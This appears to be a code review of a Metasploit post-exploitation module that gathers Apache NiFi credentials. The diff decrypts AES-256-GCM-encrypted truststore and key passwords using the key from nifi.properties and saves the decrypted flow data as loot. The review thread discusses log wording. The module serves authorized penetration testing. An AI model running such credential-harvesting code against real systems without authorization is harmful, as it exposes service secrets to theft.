modules/post/linux/gather/nifi_credentials.rb

```diff
@@ -0,0 +1,377 @@
+        @flow_json_string = @flow_json_string.gsub(controller_properties['Truststore Password'], password_decrypt)
+      end
+    end
+
+    return table_entries unless controller_properties['Truststore Filename'] && controller_properties['key-password']
+
+    name = 'Key Password'
+    username = controller_properties['Truststore Filename']
+    password = parse_aes_256_gcm_enc_string(controller_properties['key-password'])
+    return table_entries if password.nil?
+
+    password_decrypt = decrypt_aes_256_gcm(password, @decrypted_key)
+    table_entries << [name, username, password_decrypt, "Truststore Type #{controller_properties['Truststore Type']}"]
+    @flow_json_string = @flow_json_string.gsub(controller_properties['key-password'], password_decrypt)
+
+    table_entries
+  end
+
+  def decrypt_aes_256_gcm(enc_fields, key)
+    vprint_status('    Decryption initiated for AES-256-GCM')
+    vprint_status("      Nonce: #{enc_fields[:nonce]}, Auth Tag: #{enc_fields[:auth_tag]}, Ciphertext: #{enc_fields[:ciphertext]}")
+    cipher = OpenSSL::Cipher.new('AES-256-GCM')
+    cipher.decrypt
+    cipher.key = key
+    cipher.iv_len = 16
+    cipher.iv = [enc_fields[:nonce]].pack('H*')
+    cipher.auth_tag = [enc_fields[:auth_tag]].pack('H*')
+
+    decrypted_text = cipher.update([enc_fields[:ciphertext]].pack('H*'))
+    decrypted_text << cipher.final
+    decrypted_text
+  end
+
+  def parse_aes_256_gcm_enc_string(password)
+    password = password[4, password.length - 5] # remove enc{ at the beginning and } at the end
+    password.match(/(?<nonce>\w{32})(?<ciphertext>\w+)(?<auth_tag>\w{32})/) # parse out the fields
+  end
+
+  def run
+    unless ((flow_file && properties_file) || identity_file)
+      fail_with(Failure::NotFound, 'Unable to find login-identity-providers.xml, nifi.properties and/or flow.json.gz files')
+    end
+
+    properties = read_file(properties_file)
+    path = store_loot('nifi.properties', 'text/plain', session, properties, 'nifi.properties', 'nifi properties file')
+    print_good("properties data saved in: #{path}")
+    key = properties.scan(/^nifi.sensitive.props.key=(.+)$/).flatten.first.strip
+    fail_with(Failure::NotFound, 'Unable to find nifi.properties and/or flow.json.gz files') if key.nil?
+    print_good("Key: #{key}")
+    algorithm = properties.scan(/^nifi.sensitive.props.algorithm=(\w+)$/).flatten.first.strip
+    fail_with(Failure::NotFound, 'Unable to find nifi.properties and/or flow.json.gz files') if algorithm.nil?
+
+    columns = ['Name', 'Username', 'Password', 'Other Information']
+    table = Rex::Text::Table.new('Header' => 'NiFi Flow Data', 'Indent' => 1, 'Columns' => columns)
+
+    if flow_file
+      flow_json = Zlib.gunzip(read_file(flow_file))
+
+      path = store_loot('nifi.flow.json', 'application/json', session, flow_json, 'flow.json', 'nifi flow data')
+      print_good("Encrypted data saved in: #{path}")
```

Comment:
When running testing the module I was seeing following log line :
```
[+] Encrypted data saved in: /Users/jheysel/.msf4/loot/20231106174622_default_127.0.0.1_nifi.flow.json_662260.json
 ```
The file seems to be stored in plaintext:
```
cat /Users/jheysel/.msf4/loot/20231106174622_default_127.0.0.1_nifi.flow.json_662260.json
{"encodingVersion":{"majorVersion":2,"minorVersion":0},"maxTimerDrivenThreadCount":10,"maxEventDrivenThreadCount":1,"registries":[],"parameterContexts":[],"parameterProviders":[],"controllerServices":[],"reportingTasks":[],"templates":[],"rootGroup":{"identifier":"00fe2256-f750-3bcf-8759-528dcaac0103","instanceIdentifier":"a672387f-018b-1000-c3e1-f943743758d9","name":"NiFi Flow","comments":"","position":{"x":0.0,"y":0.0},"processGroups":[],"remoteProcessGroups":[],"processors":[],"inputPorts":[],"outputPorts":[],"connections":[],"labels":[],"funnels":[],"controllerServices":[],"variables":{},"defaultFlowFileExpiration":"0 sec","defaultBackPressureObjectThreshold":10000,"defaultBackPressureDataSizeThreshold":"1 GB","componentType":"PROCESS_GROUP","flowFileConcurrency":"UNBOUNDED","flowFileOutboundPolicy":"STREAM_WHEN_AVAILABLE"}}
```

Should the log line say `Decoded/ Decrypted data saved in...`?

Reply:
So we save the file twice:
1) the file as is, untouched (after gunzip) which is useful for debugging or rebuilding systems etc
2) the file which has had `sed 's/encrypted_password/decrypted_password/g'` essentially run on it. This is convenient so that if an analyst reviews, they don't have to decrypt again.

What you're questioning is the #1. I said "encrypted" since some fields may be encrypted in the file, but the file in totality is plaintext/json.  So we do need some re-wording i think to make that more clear, but I'm not quite sure on how.